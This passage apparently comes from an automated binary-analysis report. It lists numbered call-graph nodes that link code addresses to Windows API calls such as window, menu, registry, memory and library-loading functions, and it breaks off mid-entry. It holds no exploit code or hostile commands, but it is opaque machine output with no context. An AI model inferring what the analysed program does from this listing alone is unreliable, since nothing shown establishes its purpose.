49361->49364 49362->49346 49365 41fe07 49363->49365 49367 41fb0c 10 API calls 49364->49367 49366 41fb0c 10 API calls 49365->49366 49366->49362 49367->49362 49368->49351 49370 41fb27 49369->49370 49371 41fb3d 49370->49371 49372 41f8ac 4 API calls 49370->49372 49379 41f8ac 49371->49379 49372->49371 49374 41fb85 49375 41fba8 SetScrollInfo 49374->49375 49387 41fa0c 49375->49387 49378->49357 49398 418150 49379->49398 49381 41f8c9 GetWindowLongA 49382 41f906 49381->49382 49383 41f8e6 49381->49383 49401 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 49382->49401 49400 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 49383->49400 49386 41f8f2 49386->49374 49388 41fa1a 49387->49388 49389 41fa22 49387->49389 49388->49358 49390 41fa61 49389->49390 49391 41fa51 49389->49391 49397 41fa5f 49389->49397 49403 417db8 IsWindowVisible ScrollWindow SetWindowPos 49390->49403 49402 417db8 IsWindowVisible ScrollWindow SetWindowPos 49391->49402 49392 41faa1 GetScrollPos 49392->49388 49395 41faac 49392->49395 49396 41fabb SetScrollPos 49395->49396 49396->49388 49397->49392 49399 41815a 49398->49399 49399->49381 49400->49386 49401->49386 49402->49397 49403->49397 49404 420508 49405 42051b 49404->49405 49425 415aa0 49405->49425 49407 420662 49408 420679 49407->49408 49432 414644 KiUserCallbackDispatcher 49407->49432 49409 420690 49408->49409 49433 414688 KiUserCallbackDispatcher 49408->49433 49417 4206b2 49409->49417 49434 41ffd0 12 API calls 49409->49434 49410 4205c1 49430 4207b8 20 API calls 49410->49430 49415 420556 49415->49407 49415->49410 49418 4205b2 MulDiv 49415->49418 49416 4205da 49416->49407 49431 41ffd0 12 API calls 49416->49431 49429 41a274 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 49418->49429 49421 4205f7 49422 420613 MulDiv 49421->49422 49423 420636 49421->49423 49422->49423 49423->49407 49424 42063f MulDiv 49423->49424 49424->49407 49426 415ab2 49425->49426 49435 4143e0 49426->49435 49428 415aca 49428->49415 49429->49410 49430->49416 
49431->49421 49432->49408 49433->49409 49434->49417 49436 4143fa 49435->49436 49439 4105b8 49436->49439 49438 414410 49438->49428 49442 40de04 49439->49442 49441 4105be 49441->49438 49443 40de66 49442->49443 49444 40de17 49442->49444 49449 40de74 49443->49449 49447 40de74 19 API calls 49444->49447 49448 40de41 49447->49448 49448->49441 49450 40de84 49449->49450 49452 40de9a 49450->49452 49461 40d740 49450->49461 49481 40e1fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49450->49481 49464 40e0ac 49452->49464 49455 40d740 5 API calls 49456 40dea2 49455->49456 49456->49455 49457 40df0e 49456->49457 49467 40dcc0 49456->49467 49458 40e0ac 5 API calls 49457->49458 49460 40de70 49458->49460 49460->49441 49482 40eb68 49461->49482 49490 40d61c 49464->49490 49499 40e0b4 49467->49499 49472 40eacc 5 API calls 49473 40dd09 49472->49473 49474 40dd24 49473->49474 49475 40dd1b 49473->49475 49480 40dd21 49473->49480 49515 40db38 49474->49515 49518 40dc28 19 API calls 49475->49518 49519 403420 49480->49519 49481->49450 49485 40d8e0 49482->49485 49487 40d8eb 49485->49487 49486 40d74a 49486->49450 49487->49486 49489 40d92c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49487->49489 49489->49487 49491 40eb68 5 API calls 49490->49491 49492 40d629 49491->49492 49493 40d63c 49492->49493 49497 40ec6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49492->49497 49493->49456 49495 40d637 49498 40d5b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49495->49498 49497->49495 49498->49493 49523 40d8c4 49499->49523 49502 40dcf3 49506 40eacc 49502->49506 49503 40eb68 5 API calls 49504 40e0d8 49503->49504 49504->49502 49526 40e038 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49504->49526 49507 40d8e0 5 API calls 49506->49507 49508 40eae1 49507->49508 49527 4034e0 49508->49527 49512 40eaf6 49513 40d8e0 5 API calls 49512->49513 49514 40dcfe 49513->49514 49514->49472 49549 40acdc 19 API calls 49515->49549 49517 40db60 49517->49480 
49518->49480 49521 403426 49519->49521 49520 40344b 49520->49456 49521->49520 49522 402660 4 API calls 49521->49522 49522->49521 49524 40eb68 5 API calls 49523->49524 49525 40d8ce 49524->49525 49525->49502 49525->49503 49526->49502 49536 4034bc 49527->49536 49529 4034f0 49541 403400 49529->49541 49532 403744 49533 40374a 49532->49533 49535 40375b 49532->49535 49534 4034bc 4 API calls 49533->49534 49533->49535 49534->49535 49535->49512 49537 4034c0 49536->49537 49538 4034dc 49536->49538 49539 402648 4 API calls 49537->49539 49538->49529 49540 4034c9 49539->49540 49540->49529 49542 403406 49541->49542 49543 40341f 49541->49543 49542->49543 49545 402660 49542->49545 49543->49532 49546 402664 49545->49546 49547 40266e 49545->49547 49546->49547 49548 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49546->49548 49547->49543 49547->49547 49548->49547 49549->49517 49550 47b009 49555 45048c 49550->49555 49552 47b01d 49565 47a160 49552->49565 49554 47b041 49556 450499 49555->49556 49558 4504ed 49556->49558 49574 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49556->49574 49571 45034c 49558->49571 49562 450515 49563 450558 49562->49563 49576 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49562->49576 49563->49552 49581 40b528 49565->49581 49567 47a182 49568 47a1cd 49567->49568 49585 406944 49567->49585 49588 471c8c 49567->49588 49568->49554 49577 4502f8 49571->49577 49574->49558 49575 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49575->49562 49576->49563 49578 45031b 49577->49578 49579 45030a 49577->49579 49578->49562 49578->49575 49580 45030f InterlockedExchange 49579->49580 49580->49578 49582 40b533 49581->49582 49583 40b553 49582->49583 49604 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49582->49604 49583->49567 49586 402648 4 API calls 49585->49586 49587 40694f 49586->49587 49587->49567 49600 471cbd 49588->49600 49601 471d06 49588->49601 49589 471d51 49605 45071c 49589->49605 49592 471d68 49594 403420 4 API calls 49592->49594 49593 
4038a4 4 API calls 49593->49601 49595 471d82 49594->49595 49595->49567 49596 403744 4 API calls 49596->49600 49598 403744 4 API calls 49598->49601 49599 403450 4 API calls 49599->49601 49600->49596 49600->49601 49602 45071c 23 API calls 49600->49602 49613 4038a4 49600->49613 49622 403450 49600->49622 49601->49589 49601->49593 49601->49598 49601->49599 49603 45071c 23 API calls 49601->49603 49602->49600 49603->49601 49604->49583 49606 450737 49605->49606 49607 45072c 49605->49607 49639 4506c0 21 API calls 49606->49639 49628 45bf90 49607->49628 49609 450742 49611 450735 49609->49611 49640 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49609->49640 49611->49592 49614 4038b1 49613->49614 49621 4038e1 49613->49621 49616 4038da 49614->49616 49618 4038bd 49614->49618 49615 403400 4 API calls 49617 4038cb 49615->49617 49619 4034bc 4 API calls 49616->49619 49617->49600 49647 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49618->49647 49619->49621 49621->49615 49623 403454 49622->49623 49626 403464 49622->49626 49625 4034bc 4 API calls 49623->49625 49623->49626 49624 403490 49624->49600 49625->49626 49626->49624 49627 402660 4 API calls 49626->49627 49627->49624 49629 45bfa5 49628->49629 49631 45bfb4 49629->49631 49644 45bea8 19 API calls 49629->49644 49632 45bfee 49631->49632 49645 45bea8 19 API calls 49631->49645 49634 45c002 49632->49634 49646 45bea8 19 API calls 49632->49646 49638 45c02e 49634->49638 49641 45bf38 49634->49641 49638->49611 49639->49609 49640->49611 49642 45bf47 VirtualFree 49641->49642 49643 45bf59 VirtualAlloc 49641->49643 49642->49643 49643->49638 49644->49631 49645->49632 49646->49634 49647->49617 49648 40cd94 49651 406e78 WriteFile 49648->49651 49652 406e95 49651->49652 49653 42ed54 49654 42ed63 NtdllDefWindowProc_A 49653->49654 49655 42ed5f 49653->49655 49654->49655 49656 422254 49657 422263 49656->49657 49662 4211e4 49657->49662 49660 422283 49663 421253 49662->49663 49675 4211f3 49662->49675 49666 421264 49663->49666 49687 412440 
GetMenuItemCount GetMenuStringA GetMenuState 49663->49687 49665 421292 49668 421305 49665->49668 49673 4212ad 49665->49673 49666->49665 49667 42132a 49666->49667 49670 42133e SetMenu 49667->49670 49684 421303 49667->49684 49676 421319 49668->49676 49668->49684 49669 421356 49690 42112c 10 API calls 49669->49690 49670->49684 49679 4212d0 GetMenu 49673->49679 49673->49684 49674 42135d 49674->49660 49685 422158 10 API calls 49674->49685 49675->49663 49686 408c94 19 API calls 49675->49686 49678 421322 SetMenu 49676->49678 49678->49684 49680 4212f3 49679->49680 49681 4212da 49679->49681 49688 412440 GetMenuItemCount GetMenuStringA GetMenuState 49680->49688 49683 4212ed SetMenu 49681->49683 49683->49680 49684->49669 49689 421d9c 11 API calls 49684->49689 49685->49660 49686->49675 49687->49666 49688->49684 49689->49669 49690->49674 49691 40cfdc 49692 40cfe4 49691->49692 49693 40d012 49692->49693 49694 40d007 49692->49694 49702 40d00e 49692->49702 49696 40d016 49693->49696 49697 40d028 49693->49697 49703 4062a0 GlobalHandle GlobalUnWire GlobalFree 49694->49703 49704 406274 GlobalAlloc GlobalFix 49696->49704 49705 406284 GlobalHandle GlobalUnWire GlobalReAlloc GlobalFix 49697->49705 49700 40d024 49700->49702 49706 408c24 49700->49706 49703->49702 49704->49700 49705->49700 49707 408c30 49706->49707 49714 406d54 LoadStringA 49707->49714 49710 403450 4 API calls 49711 408c61 49710->49711 49712 403400 4 API calls 49711->49712 49713 408c76 49712->49713 49713->49702 49715 4034e0 4 API calls 49714->49715 49716 406d81 49715->49716 49716->49710 49717 41655c 73A15CF0 49718 48b868 49719 48b8a2 49718->49719 49720 48b8ae 49719->49720 49721 48b8a4 49719->49721 49723 48b8bd 49720->49723 49724 48b8e6 49720->49724 49917 409000 MessageBeep 49721->49917 49726 44688c 18 API calls 49723->49726 49729 48b8f5 49724->49729 49733 48b91e 49724->49733 49725 403420 4 API calls 49727 48befa 49725->49727 49728 48b8ca 49726->49728 49730 403400 4 API calls 49727->49730 49918 406b18 49728->49918 49732 
44688c 18 API calls 49729->49732 49734 48bf02 49730->49734 49736 48b902 49732->49736 49739 48b92d 49733->49739 49740 48b956 49733->49740 49926 406b68 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49736->49926 49743 44688c 18 API calls 49739->49743 49746 48b97e 49740->49746 49747 48b965 49740->49747 49741 48b8a9 49741->49725 49742 48b90d 49927 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49742->49927 49745 48b93a 49743->49745 49928 406b9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49745->49928 49754 48b98d 49746->49754 49755 48b9b2 49746->49755 49930 4071e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 49747->49930 49750 48b945 49929 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49750->49929 49752 48b96d 49931 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49752->49931 49756 44688c 18 API calls 49754->49756 49759 48b9ea 49755->49759 49760 48b9c1 49755->49760 49757 48b99a 49756->49757 49932 407210 49757->49932 49765 48b9f9 49759->49765 49766 48ba22 49759->49766 49762 44688c 18 API calls 49760->49762 49761 48b9a2 49935 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49761->49935 49764 48b9ce 49762->49764 49936 42c6e0 49764->49936 49768 44688c 18 API calls 49765->49768 49773 48ba6e 49766->49773 49774 48ba31 49766->49774 49770 48ba06 49768->49770 49946 407160 8 API calls 49770->49946 49779 48ba7d 49773->49779 49780 48baa6 49773->49780 49776 44688c 18 API calls 49774->49776 49775 48ba11 49947 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49775->49947 49778 48ba40 49776->49778 49781 44688c 18 API calls 49778->49781 49782 44688c 18 API calls 49779->49782 49786 48bade 49780->49786 49787 48bab5 49780->49787 49783 48ba51 49781->49783 49785 48ba8a 49782->49785 49948 48b56c 8 API calls 49783->49948 49950 42c780 49785->49950 49796 48baed 49786->49796 49797 48bb16 49786->49797 49790 44688c 18 API calls 49787->49790 49788 48ba5d 49949 446be0 LocalAlloc 
55136->55138 55139 466412 55137->55139 55140 414a88 4 API calls 55138->55140 55139->55030 55141 4664a8 55140->55141 55142 462fe4 11 API calls 55141->55142 55142->55143 55143->55118 55145 467f90 42 API calls 55144->55145 55146 47d47f 55145->55146 55147 47d488 55146->55147 55675 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 55146->55675 55149 414a58 4 API calls 55147->55149 55150 47d498 55149->55150 55151 403450 4 API calls 55150->55151 55152 47d4a5 55151->55152 55502 4682a0 55152->55502 55155 47d4b5 55157 414a58 4 API calls 55155->55157 55158 47d4c5 55157->55158 55159 403450 4 API calls 55158->55159 55160 47d4d2 55159->55160 55161 465c88 SendMessageA 55160->55161 55162 47d4eb 55161->55162 55163 47d529 55162->55163 55677 474c9c 23 API calls 55162->55677 55165 42414c 11 API calls 55163->55165 55166 47d533 55165->55166 55167 47d544 SetActiveWindow 55166->55167 55168 47d559 55166->55168 55167->55168 55531 47ca40 55168->55531 55215->55007 55216->55007 55217->55007 55218->55038 55219->55030 55220->55052 55228 46801c 55221->55228 55224->55083 55225->55079 55226->55080 55227->55098 55229 414a58 4 API calls 55228->55229 55230 46804e 55229->55230 55282 462d44 55230->55282 55233 414a88 4 API calls 55234 468060 55233->55234 55235 46806f 55234->55235 55237 468088 55234->55237 55311 4795d4 37 API calls 55235->55311 55239 4680cf 55237->55239 55241 4680b6 55237->55241 55238 403420 4 API calls 55240 4674be 55238->55240 55242 468134 55239->55242 55255 4680d3 55239->55255 55240->55062 55240->55064 55312 4795d4 37 API calls 55241->55312 55314 42ca28 CharNextA 55242->55314 55245 468143 55246 468147 55245->55246 55251 468160 55245->55251 55315 4795d4 37 API calls 55246->55315 55248 46811b 55313 4795d4 37 API calls 55248->55313 55250 468184 55316 4795d4 37 API calls 55250->55316 55251->55250 55291 462eb4 55251->55291 55255->55248 55255->55251 55258 46819d 55259 403778 4 API calls 55258->55259 55260 4681b3 55259->55260 55299 42c878 55260->55299 55263 4681c4 55317 462f40 
LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55263->55317 55264 4681f2 55265 42c7a8 5 API calls 55264->55265 55267 4681fd 55265->55267 55269 42c36c 5 API calls 55267->55269 55268 4681d7 55270 4508e0 4 API calls 55268->55270 55272 468208 55269->55272 55271 4681e4 55270->55271 55318 4795d4 37 API calls 55271->55318 55274 42ca9c 6 API calls 55272->55274 55276 468213 55274->55276 55275 468083 55275->55238 55303 467fb0 55276->55303 55278 46821b 55279 42cc24 7 API calls 55278->55279 55280 468223 55279->55280 55280->55275 55319 4795d4 37 API calls 55280->55319 55287 462d5e 55282->55287 55284 42ca9c 6 API calls 55284->55287 55285 403450 4 API calls 55285->55287 55286 406b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55286->55287 55287->55284 55287->55285 55287->55286 55288 462da7 55287->55288 55320 42c988 55287->55320 55289 403420 4 API calls 55288->55289 55290 462dc1 55289->55290 55290->55233 55292 462ebe 55291->55292 55293 462ed1 55292->55293 55331 42ca18 CharNextA 55292->55331 55293->55250 55295 462ee4 55293->55295 55296 462eee 55295->55296 55297 462f1b 55296->55297 55332 42ca18 CharNextA 55296->55332 55297->55250 55297->55258 55300 42c8d1 55299->55300 55301 42c88e 55299->55301 55300->55263 55300->55264 55301->55300 55333 42ca18 CharNextA 55301->55333 55304 468015 55303->55304 55305 467fc3 55303->55305 55304->55278 55305->55304 55306 41ee14 2 API calls 55305->55306 55307 467fd3 55306->55307 55308 467fed SHPathPrepareForWriteA 55307->55308 55309 41eec8 6 API calls 55308->55309 55310 46800d 55309->55310 55310->55278 55311->55275 55312->55275 55313->55275 55314->55245 55315->55275 55316->55275 55317->55268 55318->55275 55319->55275 55321 403494 4 API calls 55320->55321 55322 42c998 55321->55322 55323 403744 4 API calls 55322->55323 55326 42c9ce 55322->55326 55329 42c3b4 IsDBCSLeadByte 55322->55329 55323->55322 55325 42ca12 55325->55287 55326->55325 55328 4037b8 4 API calls 55326->55328 55330 42c3b4 IsDBCSLeadByte 55326->55330 55328->55326 55329->55322 55330->55326 
55331->55292 55332->55296 55333->55301 55336 4665cb 55334->55336 55335 466a43 55337 466a5e 55335->55337 55338 466a8f 55335->55338 55336->55335 55339 466686 55336->55339 55343 403494 4 API calls 55336->55343 55342 403494 4 API calls 55337->55342 55340 403494 4 API calls 55338->55340 55341 4666a7 55339->55341 55345 4666e8 55339->55345 55344 466a9d 55340->55344 55346 403494 4 API calls 55341->55346 55347 466a6c 55342->55347 55348 46660a 55343->55348 55432 46557c 12 API calls 55344->55432 55349 403400 4 API calls 55345->55349 55351 4666b5 55346->55351 55431 46557c 12 API calls 55347->55431 55353 414a58 4 API calls 55348->55353 55354 4666e6 55349->55354 55355 414a58 4 API calls 55351->55355 55357 46662b 55353->55357 55363 4667cc 55354->55363 55420 465c88 55354->55420 55359 4666d6 55355->55359 55356 466a7a 55358 403400 4 API calls 55356->55358 55360 403634 4 API calls 55357->55360 55362 466ac0 55358->55362 55365 403634 4 API calls 55359->55365 55366 46663b 55360->55366 55369 403400 4 API calls 55362->55369 55364 466854 55363->55364 55382 466813 55363->55382 55367 403400 4 API calls 55364->55367 55365->55354 55370 414a58 4 API calls 55366->55370 55375 466852 55367->55375 55368 466708 55371 466746 55368->55371 55372 46670e 55368->55372 55373 466ac8 55369->55373 55374 46664f 55370->55374 55378 403400 4 API calls 55371->55378 55376 403494 4 API calls 55372->55376 55377 403420 4 API calls 55373->55377 55374->55339 55379 414a58 4 API calls 55374->55379 55426 4660c4 42 API calls 55375->55426 55380 46671c 55376->55380 55381 466ad5 55377->55381 55383 466744 55378->55383 55384 466676 55379->55384 55386 476f14 42 API calls 55380->55386 55381->55103 55387 403494 4 API calls 55382->55387 55392 465f7c 42 API calls 55383->55392 55388 403634 4 API calls 55384->55388 55390 466734 55386->55390 55391 466821 55387->55391 55388->55339 55389 46687d 55398 4668de 55389->55398 55399 466888 55389->55399 55393 403634 4 API calls 55390->55393 55394 414a58 4 API calls 55391->55394 55395 46676d 
55392->55395 55393->55383 55396 466842 55394->55396 55402 4667ce 55395->55402 55403 466778 55395->55403 55397 403634 4 API calls 55396->55397 55397->55375 55400 403400 4 API calls 55398->55400 55401 403494 4 API calls 55399->55401 55404 4668e6 55400->55404 55408 466896 55401->55408 55405 403400 4 API calls 55402->55405 55406 403494 4 API calls 55403->55406 55407 4668dc 55404->55407 55418 46698f 55404->55418 55405->55363 55411 466786 55406->55411 55407->55404 55427 48eba4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55407->55427 55408->55404 55408->55407 55413 403634 4 API calls 55408->55413 55410 466909 55410->55418 55428 48ee0c 18 API calls 55410->55428 55411->55363 55414 403634 4 API calls 55411->55414 55413->55408 55414->55411 55416 466a30 55430 4290b4 SendMessageA SendMessageA 55416->55430 55429 429064 SendMessageA 55418->55429 55419->55105 55433 429fb0 SendMessageA 55420->55433 55422 465c97 55423 465cb7 55422->55423 55434 429fb0 SendMessageA 55422->55434 55423->55368 55425 465ca7 55425->55368 55426->55389 55427->55410 55428->55418 55429->55416 55430->55335 55431->55356 55432->55356 55433->55422 55434->55425 55436 478656 55435->55436 55440 47868c 55435->55440 55470 454474 55436->55470 55437 403420 4 API calls 55438 47878d 55437->55438 55438->55110 55440->55437 55441 478680 55441->55440 55442 478756 55441->55442 55443 474518 19 API calls 55441->55443 55444 476f14 42 API calls 55441->55444 55450 478704 55441->55450 55477 4781e8 31 API calls 55441->55477 55442->55110 55443->55441 55444->55441 55445 476f14 42 API calls 55445->55450 55447 42c808 5 API calls 55447->55450 55448 42c830 5 API calls 55448->55450 55450->55441 55450->55445 55450->55447 55450->55448 55451 478743 55450->55451 55478 478334 54 API calls 55450->55478 55451->55440 55452->55119 55454 42eda0 55453->55454 55455 42edc3 GetActiveWindow GetFocus 55454->55455 55456 41ee14 2 API calls 55455->55456 55457 42edda 55456->55457 55458 42edf7 55457->55458 55459 42ede7 RegisterClassA 55457->55459 55460 42ee86 
SetFocus 55458->55460 55461 42ee05 CreateWindowExA 55458->55461 55459->55458 55462 403400 4 API calls 55460->55462 55461->55460 55463 42ee38 55461->55463 55464 42eea2 55462->55464 55496 4241ec 55463->55496 55469 48ee0c 18 API calls 55464->55469 55466 42ee60 55467 42ee68 CreateWindowExA 55466->55467 55467->55460 55468 42ee7e ShowWindow 55467->55468 55468->55460 55469->55135 55471 454485 55470->55471 55472 454492 55471->55472 55473 454489 55471->55473 55487 454258 29 API calls 55472->55487 55479 454178 55473->55479 55476 45448f 55476->55441 55477->55441 55478->55450 55480 42dc54 RegOpenKeyExA 55479->55480 55481 454195 55480->55481 55482 4541e3 55481->55482 55488 4540ac 55481->55488 55482->55476 55485 4540ac 6 API calls 55486 4541c4 RegCloseKey 55485->55486 55486->55476 55487->55476 55493 42db90 55488->55493 55490 403420 4 API calls 55491 45415e 55490->55491 55491->55485 55492 4540d4 55492->55490 55494 42da38 6 API calls 55493->55494 55495 42db99 55494->55495 55495->55492 55497 42421e 55496->55497 55498 4241fe GetWindowTextA 55496->55498 55500 403494 4 API calls 55497->55500 55499 4034e0 4 API calls 55498->55499 55501 42421c 55499->55501 55500->55501 55501->55466 55503 4682c9 55502->55503 55504 414a58 4 API calls 55503->55504 55514 468316 55503->55514 55505 4682df 55504->55505 55683 462dd0 6 API calls 55505->55683 55506 403420 4 API calls 55508 4683c0 55506->55508 55508->55155 55676 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 55508->55676 55509 4682e7 55510 414a88 4 API calls 55509->55510 55511 4682f5 55510->55511 55512 468302 55511->55512 55515 46831b 55511->55515 55684 4795d4 37 API calls 55512->55684 55514->55506 55516 468333 55515->55516 55518 462eb4 CharNextA 55515->55518 55685 4795d4 37 API calls 55516->55685 55519 46832f 55518->55519 55519->55516 55520 468349 55519->55520 55521 468365 55520->55521 55522 46834f 55520->55522 55524 42c878 CharNextA 55521->55524 55686 4795d4 37 API calls 55522->55686 55525 468372 55524->55525 55525->55514 
55687 462f40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55525->55687 55527 468389 55528 4508e0 4 API calls 55527->55528 55529 468396 55528->55529 55688 4795d4 37 API calls 55529->55688 55532 47ca91 55531->55532 55533 47ca63 55531->55533 55535 47123c 55532->55535 55689 48ebc0 18 API calls 55533->55689 55536 455bc8 24 API calls 55535->55536 55537 471288 55536->55537 55538 407210 SetCurrentDirectoryA 55537->55538 55539 471292 55538->55539 55690 469db0 55539->55690 55544 476f14 42 API calls 55545 4712ee 55544->55545 55547 4712fe 55545->55547 56093 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55545->56093 55548 471320 55547->55548 56094 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55547->56094 55550 473d54 20 API calls 55548->55550 55551 47132b 55550->55551 55552 403450 4 API calls 55551->55552 55553 471348 55552->55553 55554 403450 4 API calls 55553->55554 55555 471356 55554->55555 55700 46a398 55555->55700 55677->55163 55683->55509 55684->55514 55685->55514 55686->55514 55687->55527 55688->55514 55689->55532 55692 469dd7 55690->55692 55691 469e54 56101 44f280 55691->56101 55692->55691 55693 474518 19 API calls 55692->55693 55693->55692 55696 45849c 55697 4584a2 55696->55697 55698 458784 4 API calls 55697->55698 55699 4584be 55698->55699 55699->55544 55701 46a3d6 55700->55701 55702 46a3c6 55700->55702 55704 403400 4 API calls 55701->55704 55703 403494 4 API calls 55702->55703 55705 46a3d4 55703->55705 55704->55705 55706 453cc8 5 API calls 55705->55706 55707 46a3ea 55706->55707 55708 453d04 5 API calls 55707->55708 55709 46a3f8 55708->55709 55710 46a370 5 API calls 55709->55710 55711 46a40c 55710->55711 55712 458558 4 API calls 55711->55712 55713 46a424 55712->55713 55714 403420 4 API calls 55713->55714 55715 46a43e 55714->55715 55716 403400 4 API calls 55715->55716 55717 46a446 55716->55717 55718 46a5a4 55717->55718 55719 4034e0 4 API calls 55718->55719 55720 46a5e1 55719->55720 55721 46a5ea 55720->55721 55722 46a5f9 55720->55722 55724 476f14 42 
API calls 55721->55724 55723 403400 4 API calls 55722->55723 55725 46a5f7 55723->55725 55724->55725 55726 476f14 42 API calls 55725->55726 55727 46a61c 55726->55727 55728 46a64b 55727->55728 56113 46a458 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 55727->56113 56110 46a590 55728->56110 55732 476f14 42 API calls 55733 46a68c 55732->55733 55734 458558 4 API calls 55733->55734 55735 46a6aa 55734->55735 55736 403420 4 API calls 55735->55736 55737 46a6c4 55736->55737 55738 403420 4 API calls 55737->55738 56093->55547 56094->55548 56104 44f294 56101->56104 56105 44f2a5 56104->56105 56106 44f2c6 MulDiv 56105->56106 56107 44f291 56105->56107 56108 418150 56106->56108 56107->55696 56109 44f2f1 SendMessageA 56108->56109 56109->56107 56111 403494 4 API calls 56110->56111 56112 46a59f 56111->56112 56112->55732 56113->55728 57137 435174 57138 435189 57137->57138 57139 4351a3 57138->57139 57143 434b5c 57138->57143 57148 434ba6 57143->57148 57149 434b8c 57143->57149 57144 403400 4 API calls 57145 434fab 57144->57145 57145->57139 57156 434fbc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57145->57156 57146 446638 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57146->57149 57147 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57147->57149 57148->57144 57149->57146 57149->57147 57149->57148 57150 402648 4 API calls 57149->57150 57152 431534 4 API calls 57149->57152 57153 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57149->57153 57154 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57149->57154 57157 433c44 57149->57157 57169 434408 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57149->57169 57150->57149 57152->57149 57153->57149 57154->57149 57156->57139 57158 433d01 57157->57158 57159 433c71 57157->57159 57188 433ba4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57158->57188 57160 403494 4 API calls 57159->57160 57162 433c7f 57160->57162 57164 403778 4 API calls 57162->57164 57163 403400 4 API calls 57165 433d51 57163->57165 57167 433ca0 
57164->57167 57165->57149 57166 433cf3 57166->57163 57167->57166 57170 48e858 57167->57170 57169->57149 57171 48e928 57170->57171 57172 48e890 57170->57172 57189 4481c4 57171->57189 57173 403494 4 API calls 57172->57173 57175 48e89b 57173->57175 57176 48e8ab 57175->57176 57179 4037b8 4 API calls 57175->57179 57177 403400 4 API calls 57176->57177 57178 48e94c 57177->57178 57180 403400 4 API calls 57178->57180 57182 48e8c4 57179->57182 57181 48e954 57180->57181 57181->57167 57182->57176 57183 4037b8 4 API calls 57182->57183 57184 48e8e7 57183->57184 57185 403778 4 API calls 57184->57185 57186 48e918 57185->57186 57187 403634 4 API calls 57186->57187 57187->57171 57188->57166 57190 4481e9 57189->57190 57200 44822c 57189->57200 57191 403494 4 API calls 57190->57191 57193 4481f4 57191->57193 57192 448240 57195 403400 4 API calls 57192->57195 57197 4037b8 4 API calls 57193->57197 57196 448273 57195->57196 57196->57176 57198 448210 57197->57198 57199 4037b8 4 API calls 57198->57199 57199->57200 57200->57192 57201 447dc0 57200->57201 57202 403494 4 API calls 57201->57202 57203 447df6 57202->57203 57204 4037b8 4 API calls 57203->57204 57205 447e08 57204->57205 57206 403778 4 API calls 57205->57206 57207 447e29 57206->57207 57208 4037b8 4 API calls 57207->57208 57209 447e41 57208->57209 57210 403778 4 API calls 57209->57210 57211 447e6c 57210->57211 57212 4037b8 4 API calls 57211->57212 57223 447e84 57212->57223 57213 447ebc 57215 403420 4 API calls 57213->57215 57214 447f57 57219 447f5f GetProcAddress 57214->57219 57216 447f9c 57215->57216 57216->57192 57217 447edf LoadLibraryExA 57217->57223 57218 447ef1 LoadLibraryA 57218->57223 57220 447f72 57219->57220 57220->57213 57221 403b80 4 API calls 57221->57223 57222 403450 4 API calls 57222->57223 57223->57213 57223->57214 57223->57217 57223->57218 57223->57221 57223->57222 57225 43d31c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57223->57225 57225->57223 57226 44ad3c 57227 44ad4a 57226->57227 57229 44ad69 57226->57229 57228 
44ac20 11 API calls 57227->57228 57227->57229 57228->57229 57230 447fbc 57231 447ff1 57230->57231 57232 447fea 57230->57232 57233 448005 57231->57233 57234 447dc0 7 API calls 57231->57234 57236 403400 4 API calls 57232->57236 57233->57232 57235 403494 4 API calls 57233->57235 57234->57233 57237 44801e 57235->57237 57238 44819b 57236->57238 57239 4037b8 4 API calls 57237->57239 57240 44803a 57239->57240 57241 4037b8 4 API calls 57240->57241 57242 448056 57241->57242 57242->57232 57243 44806a 57242->57243 57244 4037b8 4 API calls 57243->57244 57245 448084 57244->57245 57246 431464 4 API calls 57245->57246 57247 4480a6 57246->57247 57248 431534 4 API calls 57247->57248 57249 4480c6 57247->57249 57248->57247 57252 448104 57249->57252 57273 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57249->57273 57256 44811c 57252->57256 57274 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57252->57274 57253 448150 GetLastError 57275 447d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57253->57275 57262 441bc8 57256->57262 57257 44815f 57276 442ea4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57257->57276 57259 448174 57277 442eb4 LocalAlloc 